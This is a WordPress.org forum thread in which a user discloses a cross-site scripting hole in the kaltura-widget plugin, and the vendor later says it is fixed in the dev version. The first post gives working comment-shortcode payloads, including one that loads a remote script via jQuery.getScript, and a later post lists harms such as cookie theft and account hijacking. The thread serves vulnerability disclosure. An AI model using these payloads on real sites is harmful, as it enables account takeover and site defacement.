WordPress.org

Ready to get started?Download WordPress

Forums

kaltura-widget xss security error (9 posts)

  1. kdzwinel
    Member
    Posted 4 years ago #

    I was playing with my friend wordpress site looking for security vulnerabilities (little hobby of mine). And I found that I can run any javascript code on his site by submitting a comment.

    showing an alert:
    [kaltura-widget wid='"); alert("ok"); $("xxx' size="comments" /]

    running code from other server:
    [kaltura-widget wid='"); jQuery.getScript("http://somedomain.com/xss.js"); $("xxx' size="comments" /]

    I guess that it is a bug that should be fixed.

  2. Chris_K
    Member
    Posted 4 years ago #

    Check out Submitting_Bugs for some guidance on how to get this in front of developers.

    Thanks!

  3. kdzwinel
    Member
    Posted 4 years ago #

    Thanks for reply. I don't really have time to read 10 pages of how to submit a bug :) Fortunately, I've found link to trac and posted new ticket. Hope this helps.

  4. scribu
    Member
    Posted 4 years ago #

    You should try to contact the plugin author instead.

    I've tagged this topic so that it's more likely to get seen by other users of the plugin.

  5. kdzwinel
    Member
    Posted 4 years ago #

    Thanks for reply. I'm sorry for all this mess, but I can't figure out who is responsible for fixing this.

    On kaltura site I've found 'contact us' and send them a message, but kaltura looks like a big portal and wordpress plugin is only one of 1000 things they are baking.

    This who use this plugin must be warned because it is a serious security hole. The injected javascript can be hidden in innocent-looking post and do nasty things as account hijacking (via cookie stealing), removing articles/posts (via calling delete actions when triggered by logged admin), posting spam as registered user/admin, screwing site look (by manipulating DOM) etc. Comment moderation is no help, you should disable this plugin.

  6. scribu
    Member
    Posted 4 years ago #

    It's Kaltura responsibility, since they wrote the plugin, to promote their service.

    Since it hasn't been updated in over a year, I don't think it's high on their priority list.

  7. IdoS
    Member
    Posted 4 years ago #

    Hi,

    Definitely our responsibility - it's already in the works. We are updating the plugin on this page.

  8. GPro
    Member
    Posted 4 years ago #

    Any update on this? I looked at the plugin page linked above but it doesn't look like an update has been issued.

    I'd like to use the kaltura service but not if there is still the security issues.

    Anyone currently using without issues?

  9. IdoS
    Member
    Posted 4 years ago #

    This issue was fixed in the dev version.

Topic Closed

This topic has been closed to new replies.

About this Topic